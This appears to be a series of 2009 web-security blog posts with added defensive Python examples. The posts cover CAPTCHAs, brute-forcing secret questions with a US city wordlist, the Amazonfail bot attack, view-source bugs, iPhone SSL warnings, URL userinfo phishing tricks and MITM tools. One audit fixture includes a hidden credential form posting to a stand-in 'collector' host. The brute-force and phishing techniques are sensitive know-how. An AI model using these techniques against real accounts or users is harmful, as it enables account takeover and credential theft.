web application security lab

Google “What’s Up” CAPTCHA

April 20th, 2009

I don’t have time for a full blown Google rant today, but I was forwarded this link today and I couldn’t believe my eyes. This is Google’s “What’s Up” CAPTCHA. You know, when I first heard about it, it was described to me as “a picture and you have to tell it which way is up”. So my first reaction was “that’s a terrible CAPTCHA - only one in four chance.” Well, it’s not that bad. If you actually read the paper it’s a 1/22 chance (assuming no optimizations).

There are other problems with this though - like the fact that it relies on a set of pictures and someone has to make a judgment call on what is the correct position. I bet it’s easier to solve for humans, but it’s also fairly trivial for robots to solve too. CAPTCHA - what does that mean anyway? Let’s see if Google’s project meets the definition:

Completely Automated - Google employees need to make judgment calls ahead of time on each image orientation, so this requirement of a true CAPTCHA fails and incidentally adds a hidden cost to using the “What’s up” CAPTCHA, although it might not be huge, if you make the set small (which would cause other problems).

Public - well, as public as anything Google does is public. It’s not open source or anything, but it’s out there.

Turing Test to tell Computers - I would argue that it’s not a Turing test at all, because if you have a set of 45 robots that try only one guess apiece Google’s “What’s up” will fail to catch two of them. And again - that’s with zero optimizations. Second major failure making this not actually a CAPTCHA.

and Humans Apart - I think it fails this one as well, since blind people are humans. So are non JavaScript/Flash/CSS wielding users - I know I’m human. So that’s three major failures of one definition alone. Not great!

Someone with far greater math skills than I will some day create the mathematical proof that explains why CAPTCHAs aren’t technically achievable. It’s possible to create tests that are vaguely good at telling computers and humans apart (CAPVGTCHAs perhaps?) but unless my understanding of the universe is way off base, I think CAPTCHAs are modern day perpetual motion machines. Everyone thinks they get it and it can work, but it’s never been done, and no one has come even close, in my mind. Sorry, I know this wasn’t as good a Google rant as I normally come up with, but as one of their guys over there recently told me, “You don’t call, you don’t rant…” I know… too busy!

Little Updates

April 20th, 2009

RSAcon is starting today - and yes, I do plan on being there for anyone who happens to be in the bay. I also suggest checking out the WASC meetup on Wednesday at lunch. If you are excited about webappsec you should probably make the meetup. It’s grown to be huge from a few short years ago. We pretty much fill up that entire pool hall at Jillian’s. So yeah, it’s worth being there if you can make it. If you can’t, I suggest you live vicariously, 160 characters at a time via the IRC over SMS that is Twitter.

Next, for those of you who are into good causes Johnny Long sent out an email saying that the informer is back online. So if you have anything to disclose and you want to help out kids - disclose it there and let everyone know. Johnny was nice enough to send out a really nice x-mas card with the kids thanking us and letting us know that the clickjacking article helped and a nice video etc… Johnny is a nice guy!

US Cities Dictionary

April 17th, 2009

Born from much frustration out of not seeing this anywhere else I finally created a dictionary file for all the US cities. I really couldn’t believe such a thing wasn’t already floating around. Tons of companies use US city names as names for hardware devices, passwords for networking devices, and so on. Anyway, it finally came to a head the other day when I was presented with a secret question that said “What is your city of birth?” Well, generally speaking you know that it has to be one out of around 20,000 cities in the US, so if they don’t have any brute force detection on the secret question you can brute force that pretty easily (10,000 guesses on average per account - which only takes about 1/2 an hour if you automate it).

So I looked around places like Packetstorm’s wordlist page and a few other places and finally just decided it was easier to rip one of the GEOIP databases apart and generate my own. So if anyone else has had the same problems, never fear - you can just download the list of US Cities here. Hopefully that will make someone else’s life easier. Happy auditing!
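The missing piece the post points at is brute force detection on the secret question itself. The following is an added example, not something from the post or the dictionary it links: a sliding-window check over constructed secret-question attempt logs (the log format, account names and the 5-failures-per-hour threshold are my assumptions), plus the expected-guess count for a uniform list of the size the post mentions. Answers are never logged, only outcomes.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines (not from the post): one secret-question attempt per line.
# Only the outcome is recorded, never the answer that was tried.
SAMPLE_LOG = """\
2009-04-17T10:00:01 account=alice result=fail
2009-04-17T10:00:02 account=alice result=fail
2009-04-17T10:00:03 account=alice result=fail
2009-04-17T10:00:04 account=alice result=fail
2009-04-17T10:00:05 account=alice result=fail
2009-04-17T10:00:06 account=alice result=fail
2009-04-17T10:00:30 account=bob result=fail
2009-04-17T10:05:00 account=bob result=ok
2009-04-17T11:30:00 account=carol result=fail
2009-04-17T11:30:01 account=carol result=fail
2009-04-17T11:30:02 account=carol result=fail
2009-04-17T11:30:03 account=carol result=fail
2009-04-17T13:30:00 account=carol result=fail
2009-04-17T13:30:01 account=carol result=fail
"""


def expected_guesses(dictionary_size: int) -> float:
    """Average number of tries to hit a uniformly chosen answer with a fixed list.

    For the ~20,000 US cities in the post this is about 10,000, as the post says.
    """
    return (dictionary_size + 1) / 2


def parse_line(line: str):
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.fromisoformat(ts), fields["account"], fields["result"]


def flag_brute_force(log_text: str, threshold: int = 5, window: timedelta = timedelta(hours=1)):
    """Return {account: timestamp} for each account that reaches `threshold`
    failed secret-question attempts inside a sliding `window`.

    The threshold and window are assumed policy values, not from the post.
    """
    recent = defaultdict(deque)  # account -> timestamps of recent failures
    flagged = {}
    for line in log_text.splitlines():
        ts, account, result = parse_line(line)
        if result != "fail":
            continue
        q = recent[account]
        q.append(ts)
        # drop failures that have aged out of the window
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and account not in flagged:
            flagged[account] = ts
    return flagged


if __name__ == "__main__":
    print("expected guesses for 20,000 cities:", expected_guesses(20000))
    for account, when in flag_brute_force(SAMPLE_LOG).items():
        print("lock/alert", account, "at", when.isoformat())
```

Alice trips the threshold on her fifth failure; Carol's six failures are split across two hours and never exceed four in any one window, which is the kind of slow guessing a per-window counter alone will not see, so pair it with a lifetime cap per account.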

Amazonfail And Anti-Automation

April 16th, 2009

If you haven’t heard about it, Amazon was hit by a pretty interesting attack a few days back, and I thought I should quickly talk about it. A guy named weev was upset that Amazon was pulling the adult content off the site because they were keeping gay and lesbian content. So he found himself a CAPTCHA breaking crew (presumably from this site since he mentioned it) and paid them to create a ton of accounts. Then he used those accounts to mark all the homosexual materials as offensive content. It took a while for Amazon to recover. You can find a lot of references to the event on Twitter.

So in looking at the scripts weev wrote, although simple they were very effective in the short term. It caused Amazon a lot of grief. There’s a new company called Silver Tail Systems that’s working on an anti-automation/anti-fraud system that would have caught this type of attack in a number of different ways. Namely things like IP address, failure to follow flows properly, HTTP headers, and so on - all of which leave pretty obvious signals that a process is automated. Anyway, I thought it was an interesting attack. Certainly not something you see every day.
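To make the three signals in that paragraph concrete, here is an added example of my own, not Silver Tail’s product or weev’s scripts: a scorer over constructed request records that flags sessions which post a “flag as offensive” action without ever viewing the item, that send a stripped-down header set, or that share a client address with too many other sessions. The record format, paths, header expectations and the sessions-per-IP limit are all assumptions.

```python
from collections import defaultdict

# Constructed request records (not from the post), one per HTTP request as a web
# tier might log them: session id, client IP, method, path and request headers.
REQUESTS = [
    # a person: views the item page first, then flags it, with a browser header set
    {"sid": "h1", "ip": "10.0.0.5", "method": "GET", "path": "/item/123",
     "headers": {"User-Agent": "Mozilla/5.0", "Accept-Language": "en-US",
                 "Referer": "http://example.test/search"}},
    {"sid": "h1", "ip": "10.0.0.5", "method": "POST", "path": "/item/123/flag",
     "headers": {"User-Agent": "Mozilla/5.0", "Accept-Language": "en-US",
                 "Referer": "http://example.test/item/123"}},
    # a script: three fresh sessions from one address post flags straight away
    {"sid": "b1", "ip": "192.0.2.9", "method": "POST", "path": "/item/123/flag",
     "headers": {"User-Agent": "Python-urllib/2.5"}},
    {"sid": "b2", "ip": "192.0.2.9", "method": "POST", "path": "/item/124/flag",
     "headers": {"User-Agent": "Python-urllib/2.5"}},
    {"sid": "b3", "ip": "192.0.2.9", "method": "POST", "path": "/item/125/flag",
     "headers": {"User-Agent": "Python-urllib/2.5"}},
]

# assumed policy: headers a browser-driven flow is expected to carry, and how
# many distinct sessions one address may have before it looks like a farm
EXPECTED_HEADERS = ("Accept-Language", "Referer")
MAX_SESSIONS_PER_IP = 2


def score_sessions(requests, flag_suffix="/flag"):
    """Return {sid: [reasons]} for every session that shows an automation signal."""
    sessions_per_ip = defaultdict(set)
    for r in requests:
        sessions_per_ip[r["ip"]].add(r["sid"])

    seen_pages = defaultdict(set)  # sid -> item pages fetched with GET
    reasons = defaultdict(list)
    for r in requests:
        sid = r["sid"]
        if r["method"] == "GET":
            seen_pages[sid].add(r["path"])
            continue
        # flow signal: the state-changing POST should follow a view of the item
        if r["path"].endswith(flag_suffix):
            item = r["path"][: -len(flag_suffix)]
            if item not in seen_pages[sid]:
                reasons[sid].append("flow: flagged %s without viewing it" % item)
        # header signal: a scripted client usually sends only what it must
        missing = [h for h in EXPECTED_HEADERS if h not in r["headers"]]
        if missing:
            reasons[sid].append("headers: missing " + ", ".join(missing))
        # address signal: many sessions behind one IP during the same activity
        n = len(sessions_per_ip[r["ip"]])
        if n > MAX_SESSIONS_PER_IP:
            reasons[sid].append("ip: %d sessions from %s" % (n, r["ip"]))
    return dict(reasons)


if __name__ == "__main__":
    for sid, why in score_sessions(REQUESTS).items():
        print(sid, "->", "; ".join(why))
```

Each signal on its own has benign explanations (corporate NAT, privacy extensions that strip Referer), which is why a real system scores them together rather than blocking on any single one.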

Internet Explorer 8 and NoScript View Source Bugs

April 10th, 2009

So I’ve been sitting on two semi boring view source bugs. Not because I was saving them for a rainy day or anything, but it took me a while to think through them properly. Let’s pretend someone who is not entirely clever wants to do forensics on something to be sure the page is doing what they expect it to. This would be something like making sure that the username and password inputs are being posted to the proper SSL enabled website or something. We wouldn’t want that to be subverted so we view source to make sure it’s all kosher. Here come the two bugs.

The first bug is in Internet Explorer 8. Internet Explorer has a typical null byte bug that makes it truncate the new view source function upon reaching a null byte. So if you were to go to a page that had a null byte in the middle of it, the rest of the page wouldn’t pop up. This is not true if you use an external editor or their new nifty Developer Tools functionality, but not many people do either of those. This doesn’t appear to affect any other Internet Explorer version that I looked at.

Next is a bug in NoScript for Firefox. If you enable JavaScript (imagine it’s a site you trust or are forced to enable for various functionality) and POST some data from one page to another and then view source you’ll notice that instead of it sending a POST request it sends a GET request. I have no idea why, but it can be detected and in the case of seeing a GET request on a page that requires a POST the page can modify its resultant source code.

Both of these bugs I find to be fairly minor, but it’s just another reason you can’t trust browsers to present you with all the facts of the situation unless you really know what you’re doing. There’s a demo of the code here if you want to test it yourself (again, only works in IE8.0 or in Firefox with NoScript enabled). In either case you must enable JavaScript for it to work. If I don’t post before then and you celebrate it, Happy Easter!
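The practical lesson of the IE8 bug is to compare what the viewer shows against the raw bytes. This is an added example, not the post’s demo: it takes a constructed page (my own, with a made-up collector hostname) that hides a credential form behind an embedded null byte and reports what a NUL-terminating view source would show versus what is really there. It uses a simple regex for form actions rather than a full HTML parser, which is enough for a first forensic pass.

```python
import re

# Constructed page bytes (not the demo from the post): a login form whose
# action sits after an embedded NUL, so a viewer that stops at NUL never shows it.
PAGE = (
    b"<html><body><h1>Sign in</h1>\n"
    b"<!-- filler -->\x00\n"
    b'<form method="POST" action="http://collector.example.test/steal">\n'
    b'<input name="user"><input name="pass" type="password"></form>\n'
    b"</body></html>\n"
)

ACTION_RE = re.compile(rb'<form[^>]*\baction="([^"]*)"', re.I)


def truncated_view(raw: bytes) -> bytes:
    """What a viewer that treats NUL as end-of-string would display."""
    i = raw.find(b"\x00")
    return raw if i < 0 else raw[:i]


def form_actions(raw: bytes):
    """Form action URLs found in the given bytes, in document order."""
    return [m.group(1).decode("latin-1") for m in ACTION_RE.finditer(raw)]


def audit(raw: bytes) -> dict:
    """Compare the NUL-truncated view with the full byte stream."""
    shown = truncated_view(raw)
    visible = form_actions(shown)
    return {
        "nul_offset": raw.find(b"\x00"),            # -1 when the page is clean
        "hidden_bytes": len(raw) - len(shown),
        "visible_actions": visible,
        "hidden_actions": [a for a in form_actions(raw) if a not in visible],
    }


if __name__ == "__main__":
    report = audit(PAGE)
    print("NUL at byte", report["nul_offset"], "hiding", report["hidden_bytes"], "bytes")
    print("actions a truncating viewer shows:", report["visible_actions"])
    print("actions it hides:", report["hidden_actions"])
```

Run the same audit on a page saved with an external editor or fetched with a command line client, and any difference between the two action lists is the thing to investigate.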

Hacking Without All the Jailtime

April 6th, 2009

There’s been more and more legislation put in place to try to discourage hacking in general, and even tool development. Not that I think it’ll lead to many prosecutions anywhere, but nevertheless, it’s always nice to have a place to test. I got an email from one of my readers asking about the hackme series:

Hello and thank you for an awesome blog, and a daily read.

A while back you mentioned some “ready-made” websites that were used in the web app sec sphere to test scanners and specific tools. More specifically you mentioned 2, one of which was somewhat deprecated, but still had some educational value. I’ve been looking through your posts, but I have had no success finding this entry.

I’ll do one better - here’s a short list I compiled that includes a lot of the more popular tools for ethical testing, without all the muss and fuss of prison time. If you want to hone your skills or just have some fun at work, try these out (in no particular order):

If there are others that should be added to this list, please drop me a line and I’ll add them. I hope everyone had a good April 1st and that insurance covers whatever was damaged. ;)

Certified Application Security Specialist

April 1st, 2009

I was pretty impressed when I saw this. Apparently there is a new certification program for application security specialists. I know other companies have attempted to move in this direction. Most notably is ISC2 with their CSSLP, with their motto, “I fill the holes in your SLC”. You can see that Dave Aitel supports the CSSLP:

While I respect Dave a lot, I can’t get behind filling holes. So, thankfully the CASS is here to fill that gap for us. I went through the process - thankfully it didn’t take much time. But I think someone who goes through the entire process shows a sincere interest, and that should make employers very happy. So if you’re out of a job and need a quick certification, the Certified Application Security Specialist is the cert for you. Go check it out! Don’t be like Dave Aitel, kids. Seriously, don’t.

iPhone SSL Warning and Safari Phishing

March 29th, 2009

As some of you may have noticed, there’s a lot more going on in the SSL world and a lot more to come thanks to guys like Mike Zusman, Alex Sotirov, Moxie Marlinspike and so on… Papers forthcoming, but in the meantime I thought I’d point out a pretty nasty UI issue with the iPhone, since it’s been something I’ve been meaning to post about for a while. Given the rise in mobile computing as a legitimate way to do business, I think this kind of thing is going to become more important. If an attacker can gain MITM access through a public wifi that the iPhone is using, they can intercept a page that the user normally uses and trusts somewhat, but doesn’t necessarily trust with any sensitive data (like a blog or forum that they frequently visit for instance).

What you’re seeing is a 1×1 pixel iframe (doesn’t need to be visible, but it’s good for testing purposes) to https://www.bofa.com/ which uses an invalid certificate. Don’t ask me why one of the largest banks on earth can’t get their certs in order - that’s just the way it is. Anyway, let’s pretend instead of it being incredible sloppiness, it’s actually a MITM. The user is presented with a popup that in no way explains to them what the cert they are accepting is for. So their first instinct would be to accept it, because they aren’t going to be putting any sensitive information into the page anyway. The problem is that the cert stays with the browser session - so it will continue to work, when the user does eventually surf to their bank or whatever SSL page you’ve MITM’d.

Compare that to the desktop version of Safari, where it at least tells you that it’s related to www.bofa.com. Still not the greatest visual cue but it’s something. Incidentally, during this testing I messed around with some of the old tricks and found out that Safari still suffers from the old URL obfuscation tricks of ages past. Eg: http://www.bofa.com@ha.ckers.org/. *sigh*
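The userinfo trick works because everything before the `@` is treated as credentials, not as the host. As an added example (mine, not the post’s), here is the check a link sanitizer or phishing filter can apply: resolve the host the browser will actually connect to, flag a userinfo part that reads like a domain name, and compare the host against the text a link displays. The `example.test` hostname and the anchor texts are assumptions.

```python
from urllib.parse import urlsplit


def effective_host(url: str) -> str:
    """Host a browser actually connects to, ignoring any user@ or user:pass@ prefix."""
    return (urlsplit(url).hostname or "").lower()


def userinfo_looks_like_host(url: str) -> bool:
    """True when the userinfo part contains a dot, i.e. it reads like a domain
    name placed in front of the real host to mislead someone skimming the URL."""
    parts = urlsplit(url)
    return parts.username is not None and "." in parts.username


def link_mismatch(display_text: str, href: str) -> bool:
    """True when a link's visible text names a host other than the one the
    href resolves to (e.g. the text says www.bofa.com, the href goes elsewhere)."""
    shown = effective_host(display_text if "://" in display_text else "http://" + display_text)
    return bool(shown) and shown != effective_host(href)


def describe(url: str) -> dict:
    return {
        "shown_prefix": urlsplit(url).username,  # what a casual reader sees first
        "real_host": effective_host(url),        # where the request really goes
        "suspicious": userinfo_looks_like_host(url),
    }


if __name__ == "__main__":
    for u in ("http://www.bofa.com@ha.ckers.org/", "http://www.bofa.com/"):
        print(u, "->", describe(u))
```

The `@` form is legal URL syntax, so the check cannot simply reject it; it marks the cases where the credential slot is being used as a display trick, which is what a user-facing warning should key on.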

Pushing The Limits of Tech

March 8th, 2009

Before I begin this post, let me just say, I’ve always been a huge huge fan of technology. I’ve got more insane tech than almost anyone I know (I know HD Moore, though, so I don’t win that geek war, but I’m close). And I also like to think I’ve got a firm grasp of the web, but every once in a while something strikes me as just simply stunning. Go here, and watch it - I suggest making it full screen: the new GE smart grid website. Go visit it before you read the rest of this.

I admit it, I’m amazed. It’s very very cool tech. It’s the wave of the future, and as much as I’d like to pretend I think it’s a terrible idea, I don’t. It’s just amazing. Annnnd just as I’m getting ready to set up my printer, get my camera ready, install a plugin and give it complete access to my camera… I pause, as my security brain finally wakes up from its amazement. I think we’re soon reaching an inflection point, and in many ways have just simply skipped way past it. What’s the point of the web? Is it to delight and amaze? Is it to allow better consumerism? Is it for communication? Is it to impart information? Is it to download porn? Is it all of those things?

How can we possibly secure ourselves when amazing applications are finally on the horizon that make even hardened security folks want to drop all their guards to join in the party? Am I becoming a Scrooge? “Cool tech - bah humbug!” GE’s application is a wiretapper’s dream application yet I’m compelled to join in and be amazed. *sigh* I guess I’ll just have to watch it again and pretend I don’t want to install it.

Man in the Middle

March 4th, 2009

There has been a lot going on in the man in the middle space over the last few months. Frankly - I’m impressed. It’s something I haven’t talked much about publicly, but rather something I like to talk about to people at conferences. In fact, some of the innovations in the space are stuff I’ve been trying to get guys like Robert Graham and Dave Maynor to write into ferret for years now. That said, there have finally been some major leaps forward in actual technology to empower really nasty MITM attacks.

One thing I’ve been annoyed with is that although MITM is technically possible, and indeed has even been demonstrated in lab environments a lot, it’s really not all that common, unless you’re talking about passive listening. There aren’t a lot of programs that use MITM to actually modify traffic. Modifying it is where you get a lot more bang for your buck. There’s a good paper over at Watchfire about why active man in the middle attacks can give you a lot more. In fact, some of what’s in this paper was actually demonstrated by Rich Mogull at DefCon last year. No one was probably paying any mind to the analyst but that guy is ahead of his time, let me tell you! He was creating iframes to things like the gmail contact list and addresses from yahoo. Cool stuff - and that was just an evil twin.

Also there are a few newish tools that are really important in this space. I think both need to evolve a bit, but they’re both open source, written in python, easy to modify and do 90% of the heavy lifting. So in my mind, active MITM attacks are finally really viable for the average attacker. The first tool is SSL strip written by Moxy. It does a great job of showing how you can just down-convert into an HTTP mode, and most of the time users won’t notice - especially on pages that just post to HTTPS (a huge pet peeve of mine).

The second tool is Middler written by Jay Beale. Jay took the concept to the next level and actually built in most of the DNS spoofing/ARP spoofing part of the attack that you need, so you don’t have to run separate programs to get the attack working. Both programs deserve a lot of praise for getting this attack to be more widely understood and realistic and beyond the passive sniffing that we are all accustomed to with tools like ferret and dsniff. Sure, the concept of a MITM attack is nowhere near new, but now it’s finally accessible to the average attacker - which means it’s something we should really start thinking about, beyond saying HTTPS is a solution to our problems - clearly it is not (and for a lot more reasons than Moxy went into too).
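The pet peeve in the SSL strip paragraph, a plain HTTP page whose form posts to HTTPS, is something you can audit for in your own applications. This is an added example of mine, not code from sslstrip or Middler: given a page URL and its HTML (both constructed here, with `example.test` hostnames), it resolves each form’s action and marks the forms that an in-transit rewrite could redirect, because an HTTP page gives the user nothing to verify before the credentials leave the browser.

```python
import re
from urllib.parse import urlsplit, urljoin

# Constructed page (not from the post): served over plain HTTP, it carries a
# login form posting to HTTPS plus an ordinary search form.
PAGE_URL = "http://www.example.test/"
PAGE_HTML = """
<form method="post" action="https://secure.example.test/login">
  <input name="user"><input name="pass" type="password">
</form>
<form method="get" action="/search"><input name="q"></form>
"""

FORM_RE = re.compile(r"<form\b[^>]*>.*?</form>", re.I | re.S)
ACTION_RE = re.compile(r'\baction="([^"]*)"', re.I)
PASSWORD_RE = re.compile(r'<input\b[^>]*type="password"', re.I)


def audit_forms(page_url: str, html: str):
    """Resolve every form's action against the page URL and say whether the
    page-to-action scheme combination is one a downgrade attack can exploit."""
    page_scheme = urlsplit(page_url).scheme
    findings = []
    for form in FORM_RE.findall(html):
        m = ACTION_RE.search(form)
        action = urljoin(page_url, m.group(1) if m else "")
        action_scheme = urlsplit(action).scheme
        findings.append({
            "action": action,
            "has_password": bool(PASSWORD_RE.search(form)),
            # an http page cannot vouch for its https action: whoever rewrites the
            # page in transit can point the form anywhere and skip the TLS step,
            # and the user sees no lock icon either way
            "downgradable": page_scheme == "http" and action_scheme == "https",
        })
    return findings


def credential_forms_at_risk(page_url: str, html: str):
    """Actions of password forms that the page's own transport cannot protect."""
    return [f["action"] for f in audit_forms(page_url, html)
            if f["has_password"] and f["downgradable"]]


if __name__ == "__main__":
    for f in audit_forms(PAGE_URL, PAGE_HTML):
        print(f)
    print("credential forms at risk:", credential_forms_at_risk(PAGE_URL, PAGE_HTML))
```

The fix the check implies is to serve the page that contains the login form over HTTPS as well, not just the endpoint it posts to; serving the whole site over HTTPS removes the http-to-https hop that the downgrade relies on.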